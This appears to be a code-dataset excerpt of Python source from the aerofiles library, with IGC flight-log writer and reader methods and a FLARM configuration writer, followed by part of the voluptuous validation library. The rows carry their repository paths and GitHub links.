Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
|
Turbo87/aerofiles | aerofiles/flarmcfg/writer.py | Writer.write_waypoint | python | def write_waypoint(self, latitude=None, longitude=None, description=None):
if not description:
description = ''
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
self.write_config(
'ADDWP', '%s,%s,%s' % (latitude, longitude, description[0:50])
) | Adds a waypoint to the current task declaration. The first and the
last waypoint added will be treated as takeoff and landing location,
respectively.
::
writer.write_waypoint(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> $PFLAC,S,ADDWP,5107345N,00624765E,Meiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for takeoff and landing points.
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param description: arbitrary text description of waypoint | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/flarmcfg/writer.py#L150-L182 | [
"def format_latitude(self, value):\n return self.format_coordinate(\n value, default='0000000N', is_latitude=True)\n",
"def format_longitude(self, value):\n return self.format_coordinate(\n value, default='00000000E', is_latitude=False)\n",
"def write_config(self, key, value):\n self.writ... | class Writer:
"""
A writer for the Flarm configuration file format::
with open('flarmcfg.txt', 'w') as fp:
writer = Writer(fp)
see `FTD-14 FLARM Configuration Specification
<http://flarm.com/support/manuals-documents/>`_ and
annotated example `flarmcfg.txt
<http://www.ftv-spandau.de/streckenfluege/flarm-informationen/flarmcfg.txt>`_
"""
def __init__(self, fp=None):
self.fp = fp
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_config(self, key, value):
self.write_line('$PFLAC,S,%s,%s' % (key, value))
def write_pilot(self, pilot):
"""
Write the pilot name configuration::
writer.write_pilot('Tobias Bieniek')
# -> $PFLAC,S,PILOT,Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_config('PILOT', pilot)
def write_copilot(self, copilot):
"""
Write the copilot name configuration::
writer.write_copilot('John Doe')
# -> $PFLAC,S,COPIL,John Doe
:param copilot: name of the copilot
"""
self.write_config('COPIL', copilot)
def write_glider_type(self, glider_type):
"""
Write the glider type configuration::
writer.write_glider_type('Hornet')
# -> $PFLAC,S,GLIDERTYPE,Hornet
:param glider_type: the type of glider
"""
self.write_config('GLIDERTYPE', glider_type)
def write_glider_id(self, glider_id):
"""
Write the glider registration configuration::
writer.write_glider_id('D-4449')
# -> $PFLAC,S,GLIDERID,D-4449
:param glider_id: the registration of the glider
"""
self.write_config('GLIDERID', glider_id)
def write_competition_id(self, competition_id):
"""
Write the competition id configuration::
writer.write_competition_id('TH')
# -> $PFLAC,S,COMPID,TH
:param competition_id: competition id of the glider
"""
self.write_config('COMPID', competition_id)
def write_competition_class(self, competition_class):
"""
Write the competition class configuration::
writer.write_competition_class('Club')
# -> $PFLAC,S,COMPCLASS,Club
:param competition_class: competition class of the glider
"""
self.write_config('COMPCLASS', competition_class)
def write_logger_interval(self, interval):
"""
Write the logger interval configuration::
writer.write_logger_interval(4)
# -> $PFLAC,S,LOGINT,4
:param interval: competition class of the glider
"""
self.write_config('LOGINT', str(interval))
def write_task_declaration(self, description=None):
"""
Start a new task declaration. Any old task declaration will be cleared
by this command::
writer.write_task_declaration('My Task')
# -> $PFLAC,S,NEWTASK,My Task
:param description: optional text description of task, e.g.
"500km triangle"; can be an empty string; will be trimmed to
50 characters
"""
if not description:
description = ''
self.write_config('NEWTASK', description[0:50])
def write_waypoints(self, points):
"""
Write multiple task declaration points with one call::
writer.write_waypoints([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2'),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> $PFLAC,S,ADDWP,0000000N,00000000E,TAKEOFF
# -> $PFLAC,S,ADDWP,5124225N,00624765E,START
# -> $PFLAC,S,ADDWP,5022926N,00849263E,TURN 1
# -> $PFLAC,S,ADDWP,5035427N,00702133E,TURN 2
# -> $PFLAC,S,ADDWP,5124225N,00624765E,FINISH
# -> $PFLAC,S,ADDWP,0000000N,00000000E,LANDING
see the :meth:`~aerofiles.flarmcfg.Writer.write_waypoint` method for
more information.
:param points: a list of ``(latitude, longitude, text)`` tuples.
"""
for args in points:
if len(args) != 3:
raise ValueError('Invalid number of task point tuple items')
self.write_waypoint(*args)
|
Turbo87/aerofiles | aerofiles/flarmcfg/writer.py | Writer.write_waypoints | python | def write_waypoints(self, points):
for args in points:
if len(args) != 3:
raise ValueError('Invalid number of task point tuple items')
self.write_waypoint(*args) | Write multiple task declaration points with one call::
writer.write_waypoints([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2'),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> $PFLAC,S,ADDWP,0000000N,00000000E,TAKEOFF
# -> $PFLAC,S,ADDWP,5124225N,00624765E,START
# -> $PFLAC,S,ADDWP,5022926N,00849263E,TURN 1
# -> $PFLAC,S,ADDWP,5035427N,00702133E,TURN 2
# -> $PFLAC,S,ADDWP,5124225N,00624765E,FINISH
# -> $PFLAC,S,ADDWP,0000000N,00000000E,LANDING
see the :meth:`~aerofiles.flarmcfg.Writer.write_waypoint` method for
more information.
:param points: a list of ``(latitude, longitude, text)`` tuples. | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/flarmcfg/writer.py#L184-L212 | [
"def write_waypoint(self, latitude=None, longitude=None, description=None):\n \"\"\"\n Adds a waypoint to the current task declaration. The first and the\n last waypoint added will be treated as takeoff and landing location,\n respectively.\n\n ::\n\n writer.write_waypoint(\n latitu... | class Writer:
"""
A writer for the Flarm configuration file format::
with open('flarmcfg.txt', 'w') as fp:
writer = Writer(fp)
see `FTD-14 FLARM Configuration Specification
<http://flarm.com/support/manuals-documents/>`_ and
annotated example `flarmcfg.txt
<http://www.ftv-spandau.de/streckenfluege/flarm-informationen/flarmcfg.txt>`_
"""
def __init__(self, fp=None):
self.fp = fp
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_config(self, key, value):
self.write_line('$PFLAC,S,%s,%s' % (key, value))
def write_pilot(self, pilot):
"""
Write the pilot name configuration::
writer.write_pilot('Tobias Bieniek')
# -> $PFLAC,S,PILOT,Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_config('PILOT', pilot)
def write_copilot(self, copilot):
"""
Write the copilot name configuration::
writer.write_copilot('John Doe')
# -> $PFLAC,S,COPIL,John Doe
:param copilot: name of the copilot
"""
self.write_config('COPIL', copilot)
def write_glider_type(self, glider_type):
"""
Write the glider type configuration::
writer.write_glider_type('Hornet')
# -> $PFLAC,S,GLIDERTYPE,Hornet
:param glider_type: the type of glider
"""
self.write_config('GLIDERTYPE', glider_type)
def write_glider_id(self, glider_id):
"""
Write the glider registration configuration::
writer.write_glider_id('D-4449')
# -> $PFLAC,S,GLIDERID,D-4449
:param glider_id: the registration of the glider
"""
self.write_config('GLIDERID', glider_id)
def write_competition_id(self, competition_id):
"""
Write the competition id configuration::
writer.write_competition_id('TH')
# -> $PFLAC,S,COMPID,TH
:param competition_id: competition id of the glider
"""
self.write_config('COMPID', competition_id)
def write_competition_class(self, competition_class):
"""
Write the competition class configuration::
writer.write_competition_class('Club')
# -> $PFLAC,S,COMPCLASS,Club
:param competition_class: competition class of the glider
"""
self.write_config('COMPCLASS', competition_class)
def write_logger_interval(self, interval):
"""
Write the logger interval configuration::
writer.write_logger_interval(4)
# -> $PFLAC,S,LOGINT,4
:param interval: competition class of the glider
"""
self.write_config('LOGINT', str(interval))
def write_task_declaration(self, description=None):
"""
Start a new task declaration. Any old task declaration will be cleared
by this command::
writer.write_task_declaration('My Task')
# -> $PFLAC,S,NEWTASK,My Task
:param description: optional text description of task, e.g.
"500km triangle"; can be an empty string; will be trimmed to
50 characters
"""
if not description:
description = ''
self.write_config('NEWTASK', description[0:50])
def write_waypoint(self, latitude=None, longitude=None, description=None):
"""
Adds a waypoint to the current task declaration. The first and the
last waypoint added will be treated as takeoff and landing location,
respectively.
::
writer.write_waypoint(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> $PFLAC,S,ADDWP,5107345N,00624765E,Meiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for takeoff and landing points.
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param description: arbitrary text description of waypoint
"""
if not description:
description = ''
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
self.write_config(
'ADDWP', '%s,%s,%s' % (latitude, longitude, description[0:50])
)
|
Turbo87/aerofiles | aerofiles/igc/reader.py | Reader.read | python | def read(self, file_obj):
self.reader = LowLevelReader(file_obj)
logger_id = [[], None]
fix_records = [[], []]
task = [[], {"waypoints": []}]
dgps_records = [[], []]
event_records = [[], []]
satellite_records = [[], []]
security_records = [[], []]
header = [[], {}]
fix_record_extensions = [[], []]
k_record_extensions = [[], []]
k_records = [[], []]
comment_records = [[], []]
for record_type, line, error in self.reader:
if record_type == 'A':
if error:
logger_id[0].append(error)
else:
logger_id[1] = line
elif record_type == 'B':
if error:
if MissingRecordsError not in fix_records[0]:
fix_records[0].append(MissingRecordsError)
else:
# add MissingExtensionsError when fix_record_extensions contains error
if len(fix_record_extensions[0]) > 0 and MissingExtensionsError not in fix_records[0]:
fix_records[0].append(MissingExtensionsError)
fix_record = LowLevelReader.process_B_record(line, fix_record_extensions[1])
fix_records[1].append(fix_record)
elif record_type == 'C':
task_item = line
if error:
if MissingRecordsError not in task[0]:
task[0].append(MissingRecordsError)
else:
if task_item['subtype'] == 'task_info':
del task_item['subtype']
task[1].update(task_item)
elif task_item['subtype'] == 'waypoint_info':
del task_item['subtype']
task[1]['waypoints'].append(task_item)
elif record_type == 'D':
if error:
if MissingRecordsError not in dgps_records[0]:
dgps_records[0].append(MissingRecordsError)
else:
dgps_records[1].append(line)
elif record_type == 'E':
if error:
if MissingRecordsError not in event_records[0]:
event_records[0].append(MissingRecordsError)
else:
event_records[1].append(line)
elif record_type == 'F':
if error:
if MissingRecordsError not in satellite_records[0]:
satellite_records[0].append(MissingRecordsError)
else:
satellite_records[1].append(line)
elif record_type == 'G':
if error:
if MissingRecordsError not in security_records[0]:
security_records[0].append(MissingRecordsError)
else:
security_records[1].append(line)
elif record_type == 'H':
header_item = line
if error:
if MissingRecordsError not in header[0]:
header[0].append(MissingRecordsError)
else:
del header_item['source']
header[1].update(header_item)
elif record_type == 'I':
if error:
fix_record_extensions[0].append(error)
else:
fix_record_extensions[1] = line
elif record_type == 'J':
if error:
k_record_extensions[0].append(error)
else:
k_record_extensions[1] = line
elif record_type == 'K':
if error:
if MissingRecordsError not in k_records[0]:
k_records[0].append(MissingRecordsError)
else:
# add MissingExtensionsError when fix_record_extensions contains error
if len(k_record_extensions[0]) > 0 and MissingExtensionsError not in k_records[0]:
k_records[0].append(MissingExtensionsError)
k_record = LowLevelReader.process_K_record(line, k_record_extensions[1])
k_records[1].append(k_record)
elif record_type == 'L':
if error:
if MissingRecordsError not in comment_records[0]:
comment_records[0].append(MissingRecordsError)
else:
comment_records[1].append(line)
return dict(logger_id=logger_id, # A record
fix_records=fix_records, # B records
task=task, # C records
dgps_records=dgps_records, # D records
event_records=event_records, # E records
satellite_records=satellite_records, # F records
security_records=security_records, # G records
header=header, # H records
fix_record_extensions=fix_record_extensions, # I records
k_record_extensions=k_record_extensions, # J records
k_records=k_records, # K records
comment_records=comment_records, # L records
) | Read the specified file object and return a dictionary with the parsed data.
:param file_obj: a Python file object | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/reader.py#L20-L149 | [
"def process_B_record(decoded_b_record, fix_record_extensions):\n\n i = decoded_b_record['start_index_extensions']\n ext = decoded_b_record['extensions_string']\n\n b_record = decoded_b_record\n del b_record['start_index_extensions']\n del b_record['extensions_string']\n\n for extension in fix_rec... | class Reader:
"""
A reader for the IGC flight log file format.
Example:
.. sourcecode:: python
>>> with open('track.igc', 'r') as f:
... parsed = Reader().read(f)
"""
def __init__(self):
self.reader = None
|
alecthomas/voluptuous | voluptuous/validators.py | truth | python | def truth(f):
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check | Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir') | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L44-L64 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
